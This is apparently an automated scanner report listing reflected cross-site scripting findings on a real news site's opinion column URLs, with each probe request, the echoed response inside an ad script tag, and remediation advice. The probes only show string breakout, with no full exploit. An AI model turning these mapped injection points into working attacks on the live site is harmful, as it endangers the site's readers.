Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionf06c4'%3ba01e7d2f0a9/columnists/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 78746 Expires: Sun, 19 Dec 2010 03:13:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionf06c4';a01e7d2f0a9/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionf06c4';a01e7d2f0a9;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94765539?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10172'%3be803ff19434 was submitted in the REST URL parameter 2. This input was echoed as 10172';e803ff19434 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists10172'%3be803ff19434/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 78669 Expires: Sun, 19 Dec 2010 03:13:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists10172';e803ff19434/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists10172';e803ff19434;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99836883?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf31'%3b503052c6ac3 was submitted in the REST URL parameter 4. This input was echoed as ebf31';503052c6ac3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Diabetes+RDSP+confusion/3996673ebf31'%3b503052c6ac3/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64067 Expires: Sun, 19 Dec 2010 03:13:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/diabetes-rdsp-confusion/3996673ebf31';503052c6ac3/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=diabetes-rdsp-confusion;kw=3996673ebf31';503052c6ac3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6915'%3bc70b98c8ed7 was submitted in the REST URL parameter 5. This input was echoed as e6915';c70b98c8ed7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Diabetes+RDSP+confusion/3996673/e6915'%3bc70b98c8ed7 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44167
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6aacf'%3b2dcc50d2bea was submitted in the REST URL parameter 1. This input was echoed as 6aacf';2dcc50d2bea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6aacf'%3b2dcc50d2bea/columnists/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 81434 Expires: Sun, 19 Dec 2010 03:13:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion6aacf';2dcc50d2bea/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion6aacf';2dcc50d2bea;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35050549?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ee06'%3bd1610b97601 was submitted in the REST URL parameter 2. This input was echoed as 6ee06';d1610b97601 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists6ee06'%3bd1610b97601/Gordon+Brown+fairy+tale/3996686/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 76267 Expires: Sun, 19 Dec 2010 03:13:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists6ee06';d1610b97601/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists6ee06';d1610b97601;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=74713967?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d84'%3b589204317ff was submitted in the REST URL parameter 4. This input was echoed as b5d84';589204317ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686b5d84'%3b589204317ff/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70018 Expires: Sun, 19 Dec 2010 03:13:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/gordon-brown-fairy-tale/3996686b5d84';589204317ff/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=gordon-brown-fairy-tale;kw=3996686b5d84';589204317ff;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8d99'%3b477af5f2dc was submitted in the REST URL parameter 5. This input was echoed as b8d99';477af5f2dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Gordon+Brown+fairy+tale/3996686/b8d99'%3b477af5f2dc HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44189
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caad9'%3bfe560cef6f1 was submitted in the REST URL parameter 1. This input was echoed as caad9';fe560cef6f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinioncaad9'%3bfe560cef6f1/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 81153 Expires: Sun, 19 Dec 2010 03:13:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinioncaad9';fe560cef6f1/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinioncaad9';fe560cef6f1;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94873299?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4fea'%3bac5e157b03 was submitted in the REST URL parameter 2. This input was echoed as a4fea';ac5e157b03 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsa4fea'%3bac5e157b03/Hoping+Santa+puts+inflation+stocking/3996670/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 75080 Expires: Sun, 19 Dec 2010 03:13:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnistsa4fea';ac5e157b03/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnistsa4fea';ac5e157b03;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=13084670?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a83e8'%3b1465d38c955 was submitted in the REST URL parameter 4. This input was echoed as a83e8';1465d38c955 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670a83e8'%3b1465d38c955/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71352 Expires: Sun, 19 Dec 2010 03:13:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/hoping-santa-puts-inflation-stocking/3996670a83e8';1465d38c955/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=hoping-santa-puts-inflation-stocking;kw=3996670a83e8';1465d38c955;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faabd'%3b92cf6eecfea was submitted in the REST URL parameter 5. This input was echoed as faabd';92cf6eecfea in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/faabd'%3b92cf6eecfea HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44507
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ad4f'%3be55a38084cf was submitted in the REST URL parameter 1. This input was echoed as 8ad4f';e55a38084cf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion8ad4f'%3be55a38084cf/columnists/Retired+forgotten/3996666/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 82077 Expires: Sun, 19 Dec 2010 03:14:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion8ad4f';e55a38084cf/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion8ad4f';e55a38084cf;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24013518?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a104'%3b5a547f5c299 was submitted in the REST URL parameter 2. This input was echoed as 3a104';5a547f5c299 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists3a104'%3b5a547f5c299/Retired+forgotten/3996666/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 83730 Expires: Sun, 19 Dec 2010 03:14:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists3a104';5a547f5c299/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists3a104';5a547f5c299;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14547920?"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b60e8'%3bc423016c9ce was submitted in the REST URL parameter 4. This input was echoed as b60e8';c423016c9ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Retired+forgotten/3996666b60e8'%3bc423016c9ce/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63851 Expires: Sun, 19 Dec 2010 03:14:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:29 GMT Connection: close
